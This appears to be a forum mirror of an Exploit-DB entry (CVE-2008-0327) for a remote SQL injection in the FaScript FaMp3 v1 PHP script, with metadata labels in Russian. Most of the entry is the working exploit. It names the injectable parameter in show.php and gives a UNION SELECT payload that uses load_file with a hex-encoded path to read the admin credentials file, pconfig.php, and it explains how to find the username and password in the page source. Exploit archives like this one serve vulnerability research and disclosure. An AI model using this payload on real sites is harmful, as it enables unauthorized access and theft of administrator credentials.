- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4914
- Проверка EDB
-
- Пройдено
- Автор
- KHASHAYAR FEREIDANI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0327
- Дата публикации
- 2008-01-15
Код:
#####################################################################################
#### FaScript FaMp3 v1 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://www.fascript.com/persian.rar #
# #
#Injection Adress : http://127.0.0.1/famp3/show.php?id=<SqL Code> #
# #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php #
# You can open this file with load_file Function in mysql and see admin #
# Username and password in Page Source #
# #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 #
# #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/**/from/**/mysql.user/*
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
# milw0rm.com [2008-01-15]- Источник
- www.exploit-db.com
